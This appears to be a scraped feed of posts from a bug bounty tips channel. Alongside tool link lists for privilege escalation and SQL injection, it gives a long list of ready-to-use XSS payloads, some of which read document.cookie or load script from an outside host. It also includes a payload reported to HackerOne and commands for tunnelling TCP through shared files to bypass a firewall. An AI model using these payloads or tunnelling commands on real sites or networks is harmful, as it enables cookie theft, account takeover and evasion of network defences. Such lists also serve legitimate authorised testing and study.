Bug bounty Tips

06 Aug 2024 09:29

Pentesting Collection

Privilege Escalation

- Blog: Windows Privilege Escalation (Collection)
- Blog: Linux Privilege Escalation (Collection)
- Blog: Privilege Escalation via fail2ban
- Github: GossiTheDog/SystemNightMare
- Github: PEASS-ng
- Blogpost: NFS PrivEsc
- Blogpost: Bypassing the default UAC manually
- Github: CLSIDs for JP
- Blogpost: Using PetitPotam to NTLM Relay to Domain Administrator
- Paper: Abusing Kerberos: Kerberoasting
- Github: Kerberoast
- GitHub aclpwn.py
- Can be used to perform DCsync attacks and abuse the DACL

Bug bounty Tips

06 Aug 2024 07:58

Today, I successfully discovered multiple directory listings. Here’s a quick guide to help you do the same:


1. Select Your Target: Identify the target website you want to test.
2.Use Request Intruder: Utilize tools like Burp Suite's Intruder to automate the process.
3.Set Positions: Configure the positions in your request, e.g., target.com/{wordlist}/.
4.Analyze Responses: Examine the status codes and response lengths to identify valid directories.


credit to respected owner.

Bug bounty Tips

06 Aug 2024 07:22

If you guys okay with it let's make it this week BugBounty program

Bug bounty Tips

05 Aug 2024 09:39

https://x.com/Cipher0ps_tech/status/1820363895896248585

Bug bounty Tips

04 Aug 2024 18:46

I got sick, I will be back by tomorrow and new BugBounty program is coming tomorrow

Bug bounty Tips

02 Aug 2024 07:21

Guys, give the target from the three on which we should try it on live today

Bug bounty Tips

01 Aug 2024 13:27

📚Web Application Penetration testing Study Plan

📝This study plan is based on milestones. So, check how much you can cover and close the checkboxes. The more you close, the better candidate you are for the job role. Also, I assume you have already checked and are comfortable with Common Security Skills study plan.

Just to make sure that everyone understands what you need to learn to be a pentester. It is altogether different from bug bounty, Red Team etc. but to excel in any of those roles you should be good at pentesting. It's not necessary that you can be a Red Teamer or Bug bounty hunter if you know pentesting. But a red teamer is surely very good at pentesting. Also, Vulnerability assessment is not pentesting, however, VAPT is a common skills required for pentesters job.

🔗https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md

🔖#infosec #cybersecurity #hacking #pentesting #security

Bug bounty Tips

01 Aug 2024 13:14

🚀Found a subdomain running on Symfony debug mode.
👾Tip: Use EOS (https://github.com/synacktiv/eos) to get PHP variables and a lot more.

#BugBounty #bugbountytips #vulnerability

Bug bounty Tips

06 Aug 2024 08:26

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
11 Year old Article

Bug bounty Tips

06 Aug 2024 07:57

Just Reported XSS at Hackerone

Payload used :

"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c

Bug bounty Tips

06 Aug 2024 07:21

$23Million Bounty

WazirX Hunt Down bounty program

https://wazirx.com/blog/wazirx-bounty-program/

Bug bounty Tips

04 Aug 2024 18:48

🥪Some XSS Payloads 😅

XSS Payloads

javascripta:alert(xss)//
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
onpointerenter%3Dconfirm%281%29
<inpuT autofocus oNFocus="setTimeout(function() { /*/top'al'+'\u0065'+'rt'/*/ }, 5000);"></inpuT%3E;
jeligob139@darkse.com
2Lc4q9P(Tw6w+6'X,q'cZ36wcAE6WD5M
"><img/src/onerror=.1|alert``
Set.constructoralert\x28document.domain\x29``
";alert('XSS');//
alert][0].call(this,1)
wp-json/wp/v2/
"><a href=javas&#99;ript:alert(1)
<script>onerror=alert;throw'hacked';</script>
''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=shetty></iFramE>
javascript:alert(document.cookie)
javascript://%0aalert(1)
"><script>alert(hello)</script>
<scri00pt0>eval[(1)]</sc00rip00t>
{{0[a='constructor'][a')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
<svg><script%20?>confirm(1)
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg%2Fonload%3Deval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D’))>
<a href="javascript:alert(1)">Click Here</a>
<svg+onload='<script'-alert(1)>
<ScRiPt>alert(document.domain)</ScRiPt>
<ScRiPt/random>alert(document.domain);</ScRiPt>
<src<ScRiPt/random>ipt>alert(document.domain);<src</ScRiPt>ipt>
<scr\x00ipt>alert(document.domain)<scr\x00ipt>
"><img src=x onerror=alert(document.domain)>
"><!--><svg/onload=alert(document.domain)>
<iframe%00src="&Tab;javascript:prompt(document.domain)&Tab;%00>
<img src=1 onerror=print()>
<script>alert(document.domain)</script>
"onmousemove=alert("XSS_BY_shetty") "
<svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/*/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><IMg%20SrC=x%20onerror=prompt(xss)>
<Svg%20On%20Only=1%20Onload=alert(1)>"
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb/['al'%2b'ert';//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;
alert&#x000000028;origin&#x000029;>

🔗 @bugbounty_tech 🔗

Bug bounty Tips

03 Aug 2024 18:51

Guys 1k followers reached ❤️😍😍

Thanks one and all

Bug bounty Tips

01 Aug 2024 18:23

File-Tunnel

Tunnel TCP connections through a file. The program starts a TCP listener, and when a connection is received it writes the TCP data into a file. This same file is read by the counterpart program, which establishes a TCP connection and onforwards the TCP data. To avoid the shared file growing indefinitely, it is purged whenever it gets larger than 10 MB.

Example 1 - Bypassing a firewall

You'd like to connect from Host A to Host B, but a firewall is in the way. But both hosts have access to a shared folder.

Host A:

ft.exe --tcp-listen 127.0.0.1:5000 --write "\\server\share\1.dat" --read "\\server\share\2.dat"

ft.exe --read "\\server\share\1.dat" --tcp-connect 127.0.0.1:3389 --write "\\server\share\2.dat"

ft.exe --tcp-listen 127.0.0.1:5000 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"

ft.exe --read "\\tsclient\c\Temp\1.dat" --tcp-connect 192.168.1.50:8888 --write "\\tsclient\c\Temp\2.dat"

Bug bounty Tips

01 Aug 2024 13:20

💉SQL Injection Vulnerability Scanner Tool's

🔹SQLMap – Automatic SQL Injection And Database Takeover Tool
🔗https://github.com/sqlmapproject/sqlmap

🔹jSQL Injection – Java Tool For Automatic SQL Database Injection
🔗https://github.com/ron190/jsql-injection

🔹BBQSQL – A Blind SQL-Injection Exploitation Tool
🔗https://github.com/Neohapsis/bbqsql

🔹NoSQLMap – Automated NoSQL Database Pwnage
🔗 https://github.com/codingo/NoSQLMap

🔹Whitewidow – SQL Vulnerability Scanner
🔗https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html

🔹DSSS – Damn Small SQLi Scanner
🔗https://github.com/stamparm/DSSS

🔹explo – Human And Machine Readable Web Vulnerability Testing Format
🔗https://github.com/dtag-dev-sec/explo

🔹Blind-Sql-Bitshifting – Blind SQL-Injection via Bitshifting
🔗https://github.com/awnumar/blind-sql-bitshifting

🔹Leviathan – Wide Range Mass Audit Toolkit
🔗https://github.com/leviathan-framework/leviathan

🔹Blisqy – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)
🔗https://github.com/JohnTroony/Blisqy

🔖#infosec #cybersecurity #hacking #pentesting #security